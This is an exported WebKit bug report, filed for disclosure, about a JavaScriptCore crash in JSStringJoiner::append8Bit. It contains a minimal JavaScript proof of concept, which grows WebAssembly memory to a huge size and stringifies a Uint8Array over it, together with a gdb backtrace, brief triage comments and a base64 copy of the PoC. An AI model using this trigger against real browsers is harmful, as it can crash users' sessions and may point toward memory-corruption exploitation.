233029 2021-11-11 22:35:51 -0800 crash in JSC::JSStringJoiner::append8Bit 2021-11-19 00:46:36 -0800 1 1 1 Unclassified WebKit JavaScriptCore WebKit Local Build All Linux NEW InRadar P2 Normal --- 1 zhunkibatu webkit-unassigned fpizlo keith_miller rmorisset webkit-bug-importer ysuzuki oldest_to_newest 1814356 0 444048 zhunkibatu 2021-11-11 22:35:51 -0800 Created attachment 444048 the minimal poc the following poc can crash jsc. ##################################################################### function test() { let maxSize = 0x10000; var memory = new WebAssembly.Memory({ initial: 0x100 }); memory.grow(maxSize - 0x100); var result = String(new Uint8Array(memory.buffer)); } test(); ###################################################################### #0 WTF::Vector<WTF::StringViewWithUnderlyingString, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::uncheckedAppend<WTF::StringViewWithUnderlyingString> (value=..., this=0x7fffffffc5d8) at WTF/Headers/wtf/Vector.h:1391 #1 WTF::Vector<WTF::StringViewWithUnderlyingString, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::uncheckedAppend (value=..., this=0x7fffffffc5d8) at WTF/Headers/wtf/Vector.h:782 #2 JSC::JSStringJoiner::append8Bit (string=..., this=0x7fffffffc5c0) at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:91 #3 JSC::JSStringJoiner::appendNumber (value=<optimized out>, vm=..., this=0x7fffffffc5c0) at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:165 #4 JSC::JSStringJoiner::appendWithoutSideEffects (value=..., globalObject=<optimized out>, this=0x7fffffffc5c0) at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:121 #5 JSC::JSStringJoiner::append (value=..., globalObject=<optimized out>, this=0x7fffffffc5c0) at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:154 #6 JSC::genericTypedArrayViewProtoFuncJoin<JSC::JSGenericTypedArrayView<JSC::Uint8Adaptor> >(JSC::VM&, JSC::JSGlobalObject*, JSC::CallFrame*)::{lambda(WTF::StringView)#1}::operator()(WTF::StringView) const (this=this@entry=0x7fffffffc690, separator=...) at ../../Source/JavaScriptCore/runtime/JSGenericTypedArrayViewPrototypeFunctions.h:291 #7 0x00007ffff67456ab in JSC::genericTypedArrayViewProtoFuncJoin<JSC::JSGenericTypedArrayView<JSC::Uint8Adaptor> > (callFrame=0x7fffffffc6f0, globalObject=<optimized out>, vm=...) at WTF/Headers/wtf/text/StringView.h:340 #8 JSC::typedArrayViewProtoFuncJoin (globalObject=<optimized out>, callFrame=0x7fffffffc6f0) at ../../Source/JavaScriptCore/runtime/JSTypedArrayViewPrototype.cpp:301 #9 0x00007ffff21b78b9 in vmEntryToNative () at ../../Source/JavaScriptCore/llint/LowLevelInterpreter.cpp:536 #10 0x00007ffff514b9e0 in JSC::Interpreter::executeCall (this=<optimized out>, lexicalGlobalObject=lexicalGlobalObject@entry=0x7fffae9f9068, function=<optimized out>, callData=..., thisValue=..., args=...) at ../../Source/JavaScriptCore/runtime/NativeFunction.h:92 #11 0x00007ffff5da2e0a in JSC::call (globalObject=globalObject@entry=0x7fffae9f9068, functionObject=..., functionObject@entry=..., callData=..., thisValue=..., thisValue@entry=..., args=...) at ../../Source/JavaScriptCore/runtime/JSObject.h:1385 #12 0x00007ffff5d104c6 in JSC::arrayProtoFuncToString (globalObject=0x7fffae9f9068, callFrame=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSCJSValueInlines.h:462 #13 0x00007ffff21b78b9 in vmEntryToNative () at ../../Source/JavaScriptCore/llint/LowLevelInterpreter.cpp:536 #14 0x00007ffff514b9e0 in JSC::Interpreter::executeCall (this=<optimized out>, lexicalGlobalObject=lexicalGlobalObject@entry=0x7fffae9f9068, function=<optimized out>, callData=..., thisValue=..., args=...) at ../../Source/JavaScriptCore/runtime/NativeFunction.h:92 #15 0x00007ffff5da2e0a in JSC::call (globalObject=globalObject@entry=0x7fffae9f9068, functionObject=..., functionObject@entry=..., callData=..., thisValue=..., thisValue@entry=..., args=...) at ../../Source/JavaScriptCore/runtime/JSObject.h:1385 #16 0x00007ffff6617216 in JSC::callToPrimitiveFunction<(JSC::CachedSpecialPropertyKey)1> ( hint=JSC::PreferString, propertyName=..., object=<optimized out>, globalObject=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSCJSValueInlines.h:462 #17 JSC::JSObject::ordinaryToPrimitive (this=<optimized out>, globalObject=<optimized out>, hint=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSObject.cpp:2326 #18 0x00007ffff662d27e in JSC::JSObject::toPrimitive (this=0x7fffef1c0c48, globalObject=globalObject@entry=0x7fffae9f9068, preferredType=preferredType@entry=JSC::PreferString) at ../../Source/JavaScriptCore/runtime/JSObject.cpp:2360 #19 0x00007ffff632c174 in JSC::JSValue::toStringSlowCase (this=this@entry=0x7fffffffcf98, --Type <RET> for more, q to quit, c to continue without paging-- globalObject=0x7fffae9f9068, returnEmptyStringOnError=returnEmptyStringOnError@entry=true) at ../../Source/JavaScriptCore/runtime/JSObject.h:1385 #20 0x00007ffff6be94de in JSC::JSValue::toString (globalObject=<optimized out>, this=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSString.h:1060 #21 JSC::stringConstructor (argument=..., globalObject=<optimized out>) at ../../Source/JavaScriptCore/runtime/StringConstructor.cpp:158 #22 JSC::callStringConstructor (callFrame=<optimized out>, globalObject=<optimized out>) at ../../Source/JavaScriptCore/runtime/StringConstructor.cpp:166 #23 JSC::callStringConstructor (globalObject=<optimized out>, callFrame=<optimized out>) at ../../Source/JavaScriptCore/runtime/StringConstructor.cpp:161 #24 0x00007fffaf0ff027 in ?? () #25 0x00007fffffffd070 in ?? () #26 0x00007ffff21d443c in js_trampoline_op_call () at ../../Source/JavaScriptCore/llint/LowLevelInterpreter.cpp:536 #27 0x0000000000000000 in ?? () 1814675 1 ap 2021-11-12 16:18:41 -0800 I cannot reproduce this in jsc CLI with a recent-ish build. Perhaps already fixed? 1816751 2 webkit-bug-importer 2021-11-18 22:36:20 -0800 <rdar://problem/85587371> 1816768 3 zhunkibatu 2021-11-19 00:46:36 -0800 I still can produce in latest build. 444048 2021-11-11 22:35:51 -0800 2021-11-11 22:35:51 -0800 the minimal poc poc.js text/javascript 198 zhunkibatu ZnVuY3Rpb24gdGVzdCgpIHsKICAgIGxldCBtYXhTaXplID0gMHgxMDAwMDsKCXZhciBtZW1vcnkg PSBuZXcgV2ViQXNzZW1ibHkuTWVtb3J5KHsgaW5pdGlhbDogMHgxMDAgfSk7CgltZW1vcnkuZ3Jv dyhtYXhTaXplIC0gMHgxMDApOwoJdmFyIHJlc3VsdCA9IFN0cmluZyhuZXcgVWludDhBcnJheSht ZW1vcnkuYnVmZmVyKSk7Cn0KCnRlc3QoKTsK